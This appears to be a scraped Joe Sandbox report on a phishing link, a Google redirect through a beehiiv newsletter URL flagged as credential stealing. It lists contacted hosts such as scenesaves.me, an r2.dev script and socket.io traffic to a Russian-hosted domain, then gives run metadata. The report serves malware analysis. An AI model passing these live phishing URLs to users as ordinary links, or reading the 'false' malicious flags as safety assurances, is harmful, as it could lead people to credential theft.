  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    unknown
    link.mail.beehiiv.com
    104.18.68.40
    truefalse
      unknown
      scenesaves.me
      188.114.97.3
      truefalse
        unknown
        challenges.cloudflare.com
        104.18.94.41
        truefalse
          unknown
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            unknown
            www.google.com
            142.250.184.196
            truefalse
              unknown
              upload.wikimedia.org
              185.15.59.240
              truefalse
                unknown
                pub-cb72f4af1674441897427b55eaf679a1.r2.dev
                162.159.140.237
                truefalse
                  unknown
                  one.anotherarcher.net
                  79.137.248.152
                  truefalse
                    unknown
                    link.sbstck.com
                    188.114.97.3
                    truefalse
                      unknown
                      www.google.se
                      216.58.206.35
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBFI1&sid=9cPRcNrvQ6_PXkdbAANsfalse
                          unknown
                          https://a.nel.cloudflare.com/report/v4?s=y%2Bh0V%2B1KcdhBANIq4RM%2BeINH%2BTkjEhddPZgHd7pw4cLA%2F2q1TLbjzpo8hqZVbPlVsfUcVxqhOHfF%2Flq1IJ9BbmHSRi6vImRolYvjO4mu%2BeOVoulqSKyb%2B%2FZu8YRoRrNqfalse
                            unknown
                            https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBDYw&sid=PxklD2APRIAoLrLiAANpfalse
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/223406031:1727987438:Xv_Al2IpeM4HkywcXvVtjay6EDDaGmub-i6LKQI9Wig/8ccfd82849af42f2/57d4757eac0388bfalse
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccfd805a9cd425d/1727989041729/d299e5ec70374f3262372de51a6ce27e4074b20ef686f9f41b3ad0b3a165e40b/fRk6UL54bhzdyrZfalse
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccfd8e9a8628cba/1727989079444/253f40cf42d646e339b2e3140a0826b0f42158c4cc3913d8a465619039bc9a49/_XGmbjnvTDaPaRYfalse
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2039740840:1727987324:6iAWAvvaUE-RR1f5VjEdMpMjA0FAo4zmykNisH4-Eow/8ccfd86f5fc70ca2/54bb74df38cddf8false
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd93368b41996/1727989089358/W6rJjyMCftFIYFrfalse
                                        unknown
                                        https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=V0SbaC7hwW_9JHUoAANUfalse
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd9137e0f3342&lang=autofalse
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd8c30aa36a5c/1727989071225/koUE2VzgxDp0QBMfalse
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/false
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd7ea7f73238a/742272a500bdc81false
                                                  unknown
                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB5enfalse
                                                    unknown
                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=HxCTxStOpXjLKRD_AANafalse
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd86f5fc70ca2/1727989059466/V1GlFmnFZc-pbXafalse
                                                        unknown
                                                        https://link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3Mfalse
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8e9a8628cba&lang=autofalse
                                                            unknown
                                                            https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBHRq&sid=CMo5ShZjWOLfhW2MAANyfalse
                                                              unknown
                                                              https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBIhl&sid=Yjgpf59mLsu4qxKDAAN1false
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/false
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd86f5fc70ca2&lang=autofalse
                                                                    unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd82849af42f2/1727989047469/vzp1BJPgElHZJvFfalse
                                                                      unknown
                                                                      https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB65a&sid=HxCTxStOpXjLKRD_AANafalse
                                                                        unknown
                                                                        https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBDCZfalse
                                                                          unknown
                                                                          https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3Mfalse
                                                                            unknown
                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccfd8c30aa36a5c/1727989071228/35c0b3f0fe96f3b509617cfbbaf1b0b901a311209cfe749c4d8d11ae5856debf/opCncN-MWn-cQ2Zfalse
                                                                              unknown
                                                                              https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB29w&sid=wyN_aHWEdrC85yTCAANRfalse
                                                                                unknown
                                                                                https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBDvc&sid=PxklD2APRIAoLrLiAANpfalse
                                                                                  unknown
                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/kjx4d/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/false
                                                                                    unknown
                                                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBAhr&sid=UHGUuwfBOfyyJnD_AANjfalse
                                                                                      unknown
                                                                                      https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBCWU&sid=m8JxNlLGe8TMyYeHAANmfalse
                                                                                        unknown
                                                                                        https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB3bm&sid=V0SbaC7hwW_9JHUoAANUfalse
                                                                                          unknown
                                                                                          https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBGPN&sid=sEYXozu9UpbVjsuFAANvfalse
                                                                                            unknown
                                                                                            https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB1pJfalse
                                                                                              unknown
                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2104906782:1727987319:7BNkoO9-AtRL17urQZaSVIbp8iH-QqQFwtfmtA-3Bx0/8ccfd97029dc19b2/4e5c34555d9aecefalse
                                                                                                unknown
                                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccfd84d0859428f/1727989054307/1b1c2e8345996f0791b87668bcd9721ece3a7bc9367547aa772aa6d021fc8fb9/FoEK8nluJDkZAuyfalse
                                                                                                  unknown
                                                                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=UHGUuwfBOfyyJnD_AANjfalse
                                                                                                    unknown
                                                                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBAht&sid=UHGUuwfBOfyyJnD_AANjfalse
                                                                                                      unknown
                                                                                                      https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB4i0&sid=upBLX-IH5e62neF1AANXfalse
                                                                                                        unknown
                                                                                                        https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBANYfalse
                                                                                                          unknown
                                                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd805a9cd425d/1727989041725/ojbtsX4PF9lVuS1false
                                                                                                            unknown
                                                                                                            https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=CMo5ShZjWOLfhW2MAANyfalse
                                                                                                              unknown
                                                                                                              https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=sEYXozu9UpbVjsuFAANvfalse
                                                                                                                unknown
                                                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd93368b41996&lang=autofalse
                                                                                                                  unknown
                                                                                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB1V5&sid=l9OfwbTGmMMuZt1pAANOfalse
                                                                                                                    unknown
                                                                                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB7M_&sid=nfBwI2C7WkmjiD5NAANdfalse
                                                                                                                      unknown
                                                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1196277238:1727987378:xQwj6ohpz9SE6dkMLdxLHe_SWJOpM8PdC9Yl1QqgVmI/8ccfd7c5dee932f4/855664d3aeedc47false
                                                                                                                        unknown
                                                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd8e9a8628cba/1727989079444/hYYFsUQiuKDr-sNfalse
                                                                                                                          unknown
                                                                                                                          https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-teamfalse
                                                                                                                            unknown
                                                                                                                            https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBBK8&sid=UHGUuwfBOfyyJnD_AANjfalse
                                                                                                                              unknown
                                                                                                                              https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBG8o&sid=sEYXozu9UpbVjsuFAANvfalse
                                                                                                                                unknown
                                                                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/oijse/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/false
                                                                                                                                  unknown
                                                                                                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB3JN&sid=V0SbaC7hwW_9JHUoAANUfalse
                                                                                                                                    unknown
                                                                                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7c5dee932f4&lang=autofalse
                                                                                                                                      unknown
                                                                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd7c5dee932f4/1727989031964/firzFkNJpTj_uwafalse
                                                                                                                                        unknown
                                                                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd7ea7f73238a/1727989036537/D-jJSXgtibOEtnjfalse
                                                                                                                                          unknown
                                                                                                                                          https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=nfBwI2C7WkmjiD5NAANdfalse
                                                                                                                                            unknown
                                                                                                                                            https://a.nel.cloudflare.com/report/v4?s=SwpE30sV5MzW0vgMiJraxAWbdWv7nj%2BP3j8gVkpPmrunmoODWLANkpLfEcMCRVPo6CaQ8Cc%2F8SGJ1QViRBtg%2BM3y8ShUfFxK6z1h15Om8Vqq41q0zSLujnznVf%2BzSr7Ifalse
                                                                                                                                              unknown
                                                                                                                                              https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBIP2false
                                                                                                                                                unknown
                                                                                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccfd82849af42f2/1727989047472/e53e8c3f2f8c351e0d6de244f7bc9e0685c7312f320e241f08ded9bfaa7d5646/ub8_AuRp71dkuv3false
                                                                                                                                                  unknown
                                                                                                                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=wyN_aHWEdrC85yTCAANRfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB9q7&sid=QVT9suDRefEWf0f5AANgfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBG8u&sid=sEYXozu9UpbVjsuFAANvfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd94f6c630fa5/1727989094429/tXap5lw161HPEn9false
                                                                                                                                                          unknown
                                                                                                                                                          https://upload.wikimedia.org/wikipedia/commons/thumb/9/94/Cloudflare_Logo.png/1200px-Cloudflare_Logo.png?20211125225208false
                                                                                                                                                            unknown
                                                                                                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uzg9m/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/false
                                                                                                                                                              unknown
                                                                                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1665307749:1727987491:etmL7Xn2i2nZPB7PBeOOEZraZHJJ_mSeUDhe9JDUOk0/8ccfd94f6c630fa5/7a47944f51ba360false
                                                                                                                                                                unknown
                                                                                                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd82849af42f2&lang=autofalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB0jB&sid=l9OfwbTGmMMuZt1pAANOfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=QVT9suDRefEWf0f5AANgfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://scenesaves.me/cdn-cgi/challenge-platform/h/g/jsd/r/8ccfd79aee41159ffalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB6fK&sid=HxCTxStOpXjLKRD_AANafalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=9cPRcNrvQ6_PXkdbAANsfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd94f6c630fa5&lang=autofalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.jsfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://scenesaves.me/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB7N0&sid=nfBwI2C7WkmjiD5NAANdfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/false
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9false
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://pub-cb72f4af1674441897427b55eaf679a1.r2.dev/index.jsfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8a398d6423a&lang=autofalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBEhxfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd9137e0f3342/1727989083865/rDgMWQo3cWqGs8ofalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=m8JxNlLGe8TMyYeHAANmfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccfd7c5dee932f4/1727989031975/c050b6afae937e31e19da54d9e98b8287ddc08ae038e1fc794032090cb2b1a09/DmZznhDpVk2y9G8false
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB33yfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB3JO&sid=V0SbaC7hwW_9JHUoAANUfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd8a398d6423a/1727989066982/3a3WyOd5DBXXcnXfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KB53T&sid=upBLX-IH5e62neF1AANXfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBIhj&sid=Yjgpf59mLsu4qxKDAAN1false
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccfd8a398d6423a/1727989066988/48d396f7b289986820b63ffef1e23d2108c2126f11342b0be7b7fce412970517/7keEjPdoYduUfc-false
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=PxklD2APRIAoLrLiAANpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBHnI&sid=CMo5ShZjWOLfhW2MAANyfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://one.anotherarcher.net/socket.io/?EIO=4&transport=websocket&sid=upBLX-IH5e62neF1AANXfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBFtNfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://one.anotherarcher.net/socket.io/?EIO=4&transport=polling&t=P9KBHRo&sid=CMo5ShZjWOLfhW2MAANyfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/false
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                            https://github.com/ChromeDevTools/devtools-frontend/blob/ca17a55104e6baf8d4ab360b484111bfa93c9b7f/frchromecache_96.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&uchromecache_92.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                142.250.184.196
                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                162.159.140.237
                                                                                                                                                                                                                                pub-cb72f4af1674441897427b55eaf679a1.r2.devUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.18.94.41
                                                                                                                                                                                                                                challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.18.95.41
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                216.58.206.35
                                                                                                                                                                                                                                www.google.seUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                188.114.97.3
                                                                                                                                                                                                                                scenesaves.meEuropean Union
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                142.250.185.196
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                185.15.59.240
                                                                                                                                                                                                                                upload.wikimedia.orgNetherlands
                                                                                                                                                                                                                                14907WIKIMEDIAUSfalse
                                                                                                                                                                                                                                35.190.80.1
                                                                                                                                                                                                                                a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                104.18.68.40
                                                                                                                                                                                                                                link.mail.beehiiv.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                79.137.248.152
                                                                                                                                                                                                                                one.anotherarcher.netRussian Federation
                                                                                                                                                                                                                                12695DINET-ASRUfalse
                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.16
                                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1525237
                                                                                                                                                                                                                                Start date and time:2024-10-03 22:55:55 +02:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 3m 48s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                Sample URL:https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal48.win@21/77@38/14
                                                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.186.174, 64.233.184.84, 34.104.35.123, 52.239.251.225, 4.175.87.197, 13.85.23.206, 20.189.173.21, 13.95.31.18, 20.189.173.20, 142.250.185.67
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, onedsblobprdwus15.westus.cloudapp.azure.com, clientservices.googleapis.com, web.zrh21prdstr02a.store.core.windows.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, update.googleapis.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, q0ednre2adn0en00.z1.web.core.windows.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
